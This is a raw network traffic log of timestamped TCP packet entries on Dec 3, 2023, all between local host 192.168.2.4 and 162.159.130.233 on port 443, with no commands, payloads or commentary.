Dec 3, 2023 17:22:59.601844072 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:59.601852894 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:59.601876020 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:59.601886034 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:59.601916075 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:59.601938009 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:59.601991892 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:59.602040052 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:59.602061033 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:59.602073908 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:59.602103949 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:59.602123976 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:59.602160931 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:59.602207899 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:59.602238894 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:59.602251053 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:59.602278948 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:59.602298975 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:59.602334976 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:59.602377892 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:59.602406025 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:59.602416992 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:59.602443933 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:59.602473021 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:59.602505922 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:59.602559090 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:59.602576971 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:59.602587938 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:59.602686882 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:59.602726936 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:59.602746010 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:59.602758884 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:59.602797031 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:59.602817059 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:59.602840900 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:59.602890968 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:59.602910042 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:59.602920055 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:59.602968931 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:59.602989912 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:59.603025913 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:59.603065014 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:59.603097916 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:59.603107929 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:59.603133917 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:59.603162050 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:59.603184938 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:59.603224993 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:59.603247881 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:59.603257895 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:59.603286028 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:59.603308916 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:59.603353024 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:59.603406906 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:59.603477955 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:59.603488922 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:59.603516102 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:59.603535891 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:59.603574991 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:59.603586912 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:59.603599072 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:59.603643894 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:59.603694916 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:59.603703022 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:59.603729010 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:59.603832960 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:59.603846073 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:59.603899956 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:59.603934050 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:59.603945017 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:59.603984118 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:59.604008913 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:59.604034901 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:59.604074001 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:59.604095936 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:59.604105949 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:59.604130983 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:59.604151011 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:59.604199886 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:59.604244947 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:59.604274988 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:59.604285002 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:59.604309082 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:59.604330063 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:59.604357004 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:59.604399920 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:59.604439974 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:59.604449987 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:59.604475021 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:59.604499102 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:59.604512930 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:59.604552984 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:59.604608059 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:59.604619026 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:59.604645014 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:59.604687929 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:59.604738951 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:59.604763985 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:59.604777098 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:59.604809046 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:59.604832888 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:59.604882002 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:59.604929924 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:59.604958057 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:59.604969025 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:59.605014086 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:59.605035067 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:59.605052948 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:59.605098009 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:59.605153084 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:59.605165005 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:59.605237961 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:59.605267048 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:59.605336905 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:59.605340958 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:59.605384111 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:59.605417967 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:59.605446100 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:59.605509996 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:59.605550051 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:59.605580091 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:59.605591059 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:59.605617046 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:59.605638981 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:59.609139919 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:59.609158039 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:59.609224081 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:59.609231949 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:59.609278917 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:59.613207102 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:59.613224030 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:59.613300085 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:59.613308907 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:59.613364935 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:59.618218899 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:59.618235111 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:59.618325949 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:59.618334055 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:59.618377924 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:59.622781992 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:59.622824907 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:59.622869015 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:59.622884989 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:59.622911930 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:59.622956038 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:59.627022028 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:59.627063990 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:59.627144098 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:59.627157927 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:59.627182961 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:59.627208948 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:59.631630898 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:59.631675959 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:59.631742001 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:59.631753922 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:59.631779909 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:59.631827116 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:59.635976076 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:59.636099100 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:59.845259905 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:59.846726894 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:00.053271055 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:00.055718899 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:00.485264063 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:00.485493898 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:00.918483019 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:00.918510914 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:00.918525934 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:00.918581963 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:00.918591022 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:00.918601990 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:00.918653965 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:00.918661118 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:00.918684959 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:00.918700933 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:00.918706894 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:00.918744087 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:00.918751001 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:00.918766022 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:00.918790102 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:00.918796062 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:00.918800116 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:00.918889046 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:00.918896914 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:00.918917894 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:00.918950081 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:00.918955088 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:00.918987989 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:00.919013023 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:00.919020891 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:00.919123888 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:00.919131994 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:00.919220924 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:00.919255972 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:00.919298887 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:00.919419050 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:01.129264116 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:01.129393101 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:01.473140001 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:01.473160982 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:01.473185062 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:01.473198891 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:01.473484039 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:01.473495960 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:01.473521948 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:01.473541021 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:01.473547935 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:01.473562956 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:01.473608971 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:01.473614931 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:01.473629951 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:01.473663092 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:01.473683119 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:01.473690033 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:01.473702908 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:01.473721981 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:01.473747015 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:01.473752022 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:01.473809958 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:01.473817110 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:01.473846912 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:01.473901987 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:01.473910093 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:01.473936081 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:01.473969936 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:01.473977089 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:01.474035978 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:01.474044085 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:01.474062920 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:01.474106073 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:01.474114895 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:01.474169016 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:01.474180937 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:01.474255085 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:01.474265099 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:01.474292040 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:01.474325895 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:01.474370003 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:01.474400997 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:01.474426985 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:01.474463940 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:01.474505901 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:01.474525928 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:01.474559069 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:01.474582911 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:01.474656105 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:01.474669933 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:01.474720955 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:01.474729061 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:01.474765062 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:01.474792957 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:01.475013971 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:01.475059032 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:01.475089073 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:01.475097895 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:01.475112915 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:01.475136042 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:01.475178003 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:01.475224018 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:01.475243092 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:01.475250006 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:01.475277901 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:01.475292921 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:01.475332022 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:01.475368977 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:01.475389957 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:01.475398064 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:01.475424051 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:01.475436926 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:01.475482941 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:01.475522041 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:01.475547075 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:01.475555897 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:01.475579023 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:01.475596905 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:01.475641012 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:01.475687981 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:01.475713015 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:01.475720882 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:01.475745916 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:01.475759983 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:01.475804090 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:01.475846052 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:01.475863934 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:01.475872993 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:01.475900888 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:01.475914001 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:01.475970984 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:01.476010084 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:01.476031065 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:01.476039886 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:01.476068974 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:01.476084948 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:01.476116896 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:01.476154089 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:01.476175070 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:01.476182938 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:01.476208925 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:01.476221085 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:01.476267099 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:01.476315022 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:01.476339102 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:01.476346970 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:01.476383924 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:01.476397038 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:01.476434946 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:01.476474047 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:01.476499081 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:01.476506948 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:01.476527929 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:01.476548910 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:01.476639986 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:01.476677895 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:01.476701021 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:01.476708889 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:01.476732016 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:01.476747036 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:01.476799011 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:01.476841927 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:01.476919889 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:01.476927996 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:01.476958036 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:01.476963997 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:01.476990938 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:01.476998091 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:01.477020025 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:01.477022886 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:01.477036953 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:01.477046967 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:01.477081060 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:01.477099895 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:01.477157116 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:01.477193117 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:01.477214098 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:01.477221966 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:01.477274895 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:01.477274895 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:01.477334023 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:01.477371931 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:01.477392912 CET	49739	443	192.168.2.4	162.159.130.233
